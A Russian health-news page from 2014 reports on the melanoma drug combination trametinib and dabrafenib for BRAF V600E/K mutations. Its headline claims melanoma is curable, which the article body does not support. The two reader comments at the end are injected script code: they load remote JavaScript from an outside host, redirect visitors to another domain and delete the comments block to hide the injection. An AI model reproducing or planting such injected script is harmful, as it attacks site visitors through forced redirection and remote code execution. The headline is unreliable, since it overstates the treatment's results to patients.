Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Меланома излечима! Новый ...  >>  Меланома излечима! Новый препарат продлевает жизнь!
 
Обратная связь
 

Меланома излечима! Новый препарат продлевает жизнь!

Размер шрифта
07 февраля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Инновационная терапевтическая схема, разработанная американскими учеными, стала настоящей революцией в борьбе с меланомой.

Меланома излечима! Новый препарат продлевает жизнь!

«Среди всех злокачественных опухолей кожи меланома является самой агрессивной и занимает первое место по смертности», – рассказывает Джеффри Уэбер, глава исследовательской группы. «Новая комбинация препаратов является шагом по направлению к полному излечению меланомы, включая далеко зашедшие неоперабельные формы».

Речь идет о препаратах траметиниб (торговое название Мекинист) и дабрафениб (Тафинлар). Оба препарата воздействуют на разные звенья одного и того же сигнального внутриклеточного каскада (так называемый MAP-киназный путь). Подробное изучение этого пути в рамках молекулярной онкодерматологии началось совсем недавно и, по счастью, увенчалось грандиозным успехом – оказалось, что MAP-киназный каскад является идеальной мишенью для противоопухолевых препаратов.

Новый режим показан пациентам, у которых опухолевые клетки экспрессируют мутации в особых генах – BRAF V600E и V600K. Считается, что активность именно этих генов приводит к особенно агрессивному росту и метастазированию меланомы.

Ранее был создан класс препаратов, так называемые BRAF-ингибиторы, однако опухоль крайне часто была к ним нечувствительна, и это было серьезной проблемой в сфере лечения меланомы. Применение же новой комбинации позволяет предотвратить развитие опухолевой резистентности у пациентов с вышеупомянутыми мутациями.

«В ходе нашего исследования мы достигали позитивного результата в 76% случаев применения Мекиниста и Тафинлара. Кроме того, оказалось, что побочные эффекты при применении двух препаратов оказывались менее выраженными и случались реже, чем при монотерапии», – рассказывает Уэбер.

Американская FDA (Управление по санитарному надзору за качеством пищевых продуктов и медикаментов) одобрила применение этих препаратов по ускоренной процедуре, что случается, когда на анализ экспертам попадает препарат против тяжелых заболеваний, обладающей мощной доказательной базой. Поэтому совсем скоро комбинация будет повсеместно внедрена в клиническую практику на территории Соединенных Штатов.

Будем надеяться, что в России появление этих лекарств также не слишком задержится.

Другая полезнейшая информация об онкологических заболеваниях – на страницах нашего специального проекта «Онко-дозор».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце   Кто живет внутри вас? Бактерии! Да еще приводят к раку!   Рак кожи или просто родинка? Как отличить?   Какой напиток не позволит вам ослепнуть?!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Не показывайте мужчинам ноги – они выдадут все ваши секреты!
Что можно и чего нельзя с изжогой?
Как курение влияет на вашу кожу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.